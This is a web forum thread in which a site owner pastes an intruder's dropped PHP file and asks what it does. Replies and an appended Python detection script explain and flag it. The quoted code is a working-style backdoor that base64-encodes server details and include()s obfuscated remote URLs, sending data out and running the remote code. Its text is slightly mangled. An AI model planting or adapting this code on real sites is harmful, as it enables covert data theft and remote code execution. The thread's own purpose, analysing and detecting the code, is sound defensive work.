  1. #1
    SitePoint Addict
    Join Date
    Mar 2003
    Location
    Greenville, SC
    Posts
    388

    Hacker getting into my site changing pages and uploading pages

    Hello Folks.

    I have a hacker getting into my site somehow. I suspect it is my folder permissions or a PHP script that needs to be removed, improved or updated.

    They are uploading the following script and naming it a random number .php. Example: 115954.php. Here is the code for one of the files:

    PHP Code:
    <? error_reporting(0);$s="e";
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

    $str=base64_encode($a).".".base64_encode($b)."."..".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); 

    if ((include(
    base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){

    else{
    include(
    base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);

    ?>
    What does this mean? What are they doing with this script?

  2. #2
    SitePoint Enthusiast
    Join Date
    Feb 2007
    Location
    Swindon, UK
    Posts
    50
    By the looks of things they are sending information about your server to their website - using an include with a query string on the end.

    Really not sure for what purpose - it's all just server variables and things; I guess they must do it for a reason.

    Anyway, if you wanted to know, this is a sample of the include they are sending back (decoded):

    http://shop.vmarket.info/?localhost.......Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3.127.0.0.1.e.C:/sokkit/site/webdesign/test.php.en-gb,en;q=0.5

    I would be more concerned personally with the fact they have been uploading files to your server!

  3. #3
    SitePoint Wizard wheeler's Avatar
    Join Date
    Mar 2006
    Location
    Gold Coast, Australia
    Posts
    1,369
    I've seen a script that looked a bit like this but trimmed down, that made it appear that "free-ringtones.html" and several thousand other rubbish .html files resided inside folders on a site when in fact they didn't. The result was that very quickly, all the search engines crawled these non-existent files and the traffic started rolling in. I believe it occurred while performing a large transfer of files onto a new folder, where the FTP connection was somehow hijacked.

    Also, Google's cached pages showed text that did not visibly exist on the site.
    Studiotime - Time Management for Web Developers
    to-do's, messages, invoicing, reporting - 30 day free trial!
    Thomas Multimedia Web Development
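
The file in the first post hides its include() targets behind base64_decode() literals, which the second post reads as sending server details to a remote site. As an added example (not code from the thread), this Python triage script resolves those literals statically and flags a PHP file that includes a remote URL or carries the numeric file name described; the function names and finding labels are assumptions.

```python
import base64
import re

# Excerpt of the include() lines from the file quoted in the first post.
SAMPLE = r'''if ((include(
base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){
else{
include(
base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);'''

# include/require call; the argument may hold one level of nested calls.
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(((?:[^()]|\([^()]*\))*)\)', re.I)
# Concatenation pieces: base64_decode("..."), a quoted literal, or a $variable.
TOKEN_RE = re.compile(
    r'base64_decode\(\s*(["\'])(.*?)\1\s*\)|(["\'])(.*?)\3|(\$\w+)', re.I)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?{]+)', re.I)

def resolve(expr):
    """Statically rebuild the string an include() argument evaluates to."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(2) is not None:        # base64_decode("literal")
            try:
                out.append(base64.b64decode(m.group(2)).decode("latin-1"))
            except ValueError:            # not valid base64
                out.append("{undecodable}")
        elif m.group(4) is not None:      # plain quoted literal
            out.append(m.group(4))
        else:                             # runtime value, kept as placeholder
            out.append("{" + m.group(5) + "}")
    return "".join(out)

def triage(filename, source):
    """Return (reason, detail) findings for one PHP file."""
    findings = []
    if re.fullmatch(r"\d+\.php", filename):   # "random number .php" naming
        findings.append(("numeric-filename", filename))
    for m in INCLUDE_RE.finditer(source):
        remote = REMOTE_RE.match(resolve(m.group(1)))
        if remote:                            # include() of a remote URL
            findings.append(("remote-include", remote.group(1)))
    return findings

if __name__ == "__main__":
    for finding in triage("115954.php", SAMPLE):
        print(finding)
```

Run `triage()` over every `.php` file under the web root to find other dropped copies. With PHP's `allow_url_include` setting off, `include()` cannot fetch a remote URL at all.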

